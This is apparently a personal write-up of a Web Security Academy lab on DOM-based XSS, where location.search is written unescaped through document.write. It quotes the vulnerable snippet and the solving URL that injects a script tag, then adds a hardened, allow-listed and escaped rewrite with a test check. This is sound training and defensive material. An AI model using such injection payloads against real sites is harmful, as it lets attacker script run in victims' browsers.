WSA: DOM XSS in document.write sink using source location.search
Introduction
Not much to say here, just glad to have found some time for challenges ;P
Challenge
You can check the lab out: here
Starting with the usual process: poking around the site while routing all traffic through our proxy, so that any request can be replayed later on. [1]
Each product page has a “Check Stock” feature which, after viewing the page source, turns out to be handled by the following JavaScript snippet:
    var stores = ["London","Paris","Milan"];
    // storeId is read straight from the query string (source: location.search)
    var store = (new URLSearchParams(window.location.search)).get('storeId');
    document.write('<select name="storeId">');
    if(store) {
        // the untrusted value is concatenated into markup unescaped (sink: document.write)
        document.write('<option selected>'+store+'</option>');
    }
    for(var i=0;i<stores.length;i++) {
        if(stores[i] === store) {
            continue;
        }
        document.write('<option>'+stores[i]+'</option>');
    }
    document.write('</select>');
In our request we can see the parameters that can be modified:
productId=1&storeId=London
Sample link that gives us the desired output in the console:
https://0a0000f80482f11380d980510011009c.web-security-academy.net/product?productId=1&storeId=asdfasdf
After that it was tedious: we just had to break out of the enclosing <option> and <select> elements and add a script one:
https://0a0000f80482f11380d980510011009c.web-security-academy.net/product?productId=1&storeId=</option></select><script>alert(1)</script>
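To show why the snippet above is a sink and what a fix looks like, here is an added example (my own code, not the lab's): the lab logic rebuilt as a pure function over the query string, next to a hardened version that allow-lists storeId and HTML-escapes anything it reflects. Function names (renderStoreSelectUnsafe, renderStoreSelect, selectedStore, escapeHtml, onlyExpectedTags) are mine; it runs under Node without a DOM, and in a browser you would pass window.location.search and insert the result via createElement/textContent rather than document.write.

```javascript
// Added example (not the lab's code): the "Check Stock" store selector from
// the page, first as the original string-concatenation sink, then hardened.
// Pure functions over a query string so it runs under Node without a DOM;
// in the browser you would pass window.location.search and insert the result
// with createElement/textContent rather than document.write.
const STORES = ["London", "Paris", "Milan"];

// Mirrors the lab snippet: storeId is concatenated into markup unescaped.
function renderStoreSelectUnsafe(search) {
  const store = new URLSearchParams(search).get("storeId");
  let html = '<select name="storeId">';
  if (store) html += "<option selected>" + store + "</option>";
  for (const s of STORES) {
    if (s === store) continue;
    html += "<option>" + s + "</option>";
  }
  return html + "</select>";
}

// Escape the five characters that matter in HTML text and attribute values.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Allow-list: return storeId only if it is a known store, else null.
function selectedStore(search) {
  const store = new URLSearchParams(search).get("storeId");
  return STORES.includes(store) ? store : null;
}

// Hardened version: only allow-listed values are reflected, and even those
// are escaped so a later change to STORES cannot reopen the sink.
function renderStoreSelect(search) {
  const store = selectedStore(search);
  let html = '<select name="storeId">';
  for (const s of STORES) {
    html += `<option${s === store ? " selected" : ""}>${escapeHtml(s)}</option>`;
  }
  return html + "</select>";
}

// Test invariant: the rendered markup may contain only <select> and <option>
// tags; anything else means attacker-controlled markup reached the sink.
function onlyExpectedTags(html) {
  const tags = html.match(/<\/?([a-z]+)/gi) || [];
  return tags.every((t) => /^<\/?(select|option)$/i.test(t));
}
```

The onlyExpectedTags check is the kind of invariant worth keeping in the unit tests of any template that still builds HTML from strings.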
Summary
This was the first challenge I completed for the day, and I think it was the perfect way to start it: not too easy, but at the same time not too difficult.
Paying some attention to the vulnerable snippet was all that was needed here!
Footnotes:
[1] Not really necessary, knowing that we are checking for DOM XSS, but all is fine.